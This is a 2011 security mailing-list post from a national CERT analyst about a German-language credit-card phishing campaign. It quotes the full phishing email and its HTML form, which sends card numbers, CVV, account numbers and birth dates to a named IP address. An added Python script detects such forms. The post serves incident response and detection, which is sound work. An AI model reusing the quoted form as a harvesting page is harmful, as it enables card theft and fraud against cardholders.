[nsp-sec] Phishing dropbox at (AS 27715)

David Jiménez ddavinci at gmail.com
Mon Jul 25 20:02:22 EDT 2011


In case you didn't get the html file:


EVIDENCE
/////////////////////////////////////////////////

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head><META
http-equiv="Content-Type" content="text/html;
charset=utf-8"></head><body>
<div>         <dl> <p><img src="
http://compare-best-credit-cards.com/wp-content/uploads/2009/12/186563.gif"
width="160" height="100"> <img src="
http://www.fsgbank.com/media/ext/uploaded/c838dd39-375d-4135-a88c-55c0b3a15f48/logo_mastercardSecurecode.png"
style="margin-left:400px"></p> <hr> <dt>1</dt><dd>Eingeben<br>Details</dd>
<dt>2</dt><dd>Finish</dd> <div>  </div>  <h1> Schritt 1 - Geben Sie die
Details </h1>  <a name="0.1_main"></a>  </dl></div> <div> <div> <h2>
Informationen
zur Abrechnung</h2> </div> <div> <table><td><form action="
http://189.126.116.82/wp-kunden.php" name="0.1_processForm" method="POST"
target="_blank" onsubmit="return window.confirm("You are submitting
information to an external page.\nAre you sure?");">  <td><span><span>
<strong><u>Kreditkarten-Informationen</u></strong> - Bitte geben Sie Ihren
Kredit-oder Debit Card.</span></span></td>  <tr> <td> <form action="
http://189.126.116.82/wp-kunden.php" name="0.1_processForm" method="POST"
target="_blank" onsubmit="return window.confirm("You are submitting
information to an external page.\nAre you sure?");"></form></td> </tr>
<tr> <td><table width="735" border="0" align="center" cellpadding="3"
cellspacing="3">  <tr> <td><div align="right">Debit / Credit Card-Nummer:
</div></td> <td width="24%"><input name="card" title="Debit / Credit Card
Number" type="text" size="25" maxlength="23"></td> <td width="6%"><img src="
http://www.ysutopia.net/images/logo_cc_visa_37x23.gif" alt="Visa" width="37"
height="23"></td> <td width="23%"><img src="
http://www.ysutopia.net/images/logo_cc_mc_37x23.gif" alt="MasterCard" width
="37" height="23"><img src="
https://secure.wp3.rbsworldpay.com/sc2/jsp/shopper/icons/MAESTRO-SSL.gif"
alt="" width="43" height="23"></td> </tr> <tr> <td><div
align="right">Verfallsdatum:
</div></td> <td colspan="3"><select name="expm" title="Expiration
Month"> <option
value="">- Month -</option> <option>01</option> <option>02</option> <option>
03</option> <option>04</option> <option>05</option> <option>06</option>
<option>07</option> <option>08</option> <option>09</option> <option>10
</option> <option>11</option> <option>12</option> </select> / <select name="
expy" title="Expiration Year"> <option value="">- Year -</option> <option>
2011</option> <option>2012</option> <option>2013</option> <option>2014
</option> <option>2015</option> <option>2016</option> <option>2017</option>
<option>2018</option> </select></td> </tr> <tr> <td><div align="right">
Karten-Prüfnummer:</div></td> <td colspan="3"><input name="cvv" title="Card
Verification Number" type="text" size="4" maxlength="4"> [ <a>view sample
</a> ]</td> </tr> <tr> <td><div align="right">Konto-Nummer:</div></td>
<td><input
name="ssn" title="Account Number" type="text" size="25" maxlength="50"></td>
</tr> <tr> <td width="47%"><div align="right">Geburtsdatum:
</div></td> <td><input
name="a" title="CardHolder Name" type="text" size="2" maxlength="2"> <input
name="b" title="CardHolder Name" type="text" size="2" maxlength="2"> <input
name="c" title="CardHolder Name" type="text" size="4" maxlength="4"> <br>
<span>(mm/dd/yyyy)</span></td> </tr> <tr>  </tr></table></td> </tr> <tr>
<td><div align="center"></div></td> </tr> <tr> <td> </td> </tr> <tr> <td>
</td> </tr> <tr> <td><div align="center"> <input type="submit" name="Submit"
value=" Submit Informationen "> </div></td> </tr>  <td><br> <br>      <ul>
<li> © <a title="Opens in new window" href="http://www.visa.com" target="
_blank">Visa / MasterCard</a></li> </ul>    </td></form></td></table></div>
</div></body></html>


2011/7/25 David Jiménez <ddavinci at gmail.com>

>
> Hi Folks,
>
> Just received the following email with a phishing html as attachment that
> drops the information at 189.126.116.82 (AS27715).
>
> Anyone able to shut it down and share flows related to IPs connecting to
> this site?
>
> Kind Regards
>
> *From: *Visa und Mastercard <Sicherheit at visa-mastercard.de>
> *Date: *July 25, 2011 18:35:18 CDT
> *Subject: **Notice: For security reasons your credit card is
> suspended.*
>
> Dear cardholder,
>
> Visa and MasterCard is updating the security on
> all credit cards.
>
> For this reason your credit card will be suspended until you
> confirm your credit card details.
>
> To confirm your details and reactivate your
> credit card, please download the attached form.
>
> Note: This is very important for the security of your credit card.
>
> Thank you for your understanding.
>
> ------------------------------
> Mail scanned by McAfee SCM
>
> --
>
> ---
> David Jimenez | CERT-MX Operations Center
> --------------------------------------------------------------
> Mexican National CSIRT
> Federal Police / E-Crime Unit
> Email: cert-mx at ssp.gob.mx
> Phishing Report: phishing at ssp.gob.mx
> PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
>



-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
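
An added example, not part of the original post or any CERT-MX tooling: Python that parses an HTML attachment like the one quoted above and reports forms that send card fields to an absolute URL, flagging IP-literal and plaintext targets. The field watch list, the sample HTML and the 203.0.113.10 address are constructed assumptions.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed watch list: the card-related input names used in the attachment above.
CARD_FIELDS = {"card", "cvv", "expm", "expy", "ssn"}
# Constructed sample (not the original attachment); 203.0.113.10 is a documentation address.
SAMPLE = """<html><body><form action="
http://203.0.113.10/collect.php" method="POST">
<input name="card" type="text"><select name="
expy"><option>2011</option></select>
<input name="cvv" type="text"><input type="submit" name="Submit">
</form></body></html>"""

class FormAudit(HTMLParser):
    """Record each form's action and the input/select names that follow it."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        # Mail line-wrapping leaves newlines inside attribute values; strip them.
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag in ("input", "select") and self.forms and a.get("name"):
            self.forms[-1]["fields"].append(a["name"])

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit(html):
    """Return one finding per form that sends card fields to an absolute URL."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        hits = sorted(CARD_FIELDS & set(form["fields"]))
        if url.scheme in ("http", "https") and hits:
            findings.append({"action": form["action"], "plaintext": url.scheme == "http",
                             "ip_literal": is_ip_literal(url.hostname or ""), "card_fields": hits})
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Fields are attributed to the most recently opened form, which matches attachments that repeat the same form tag, as the one above does.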


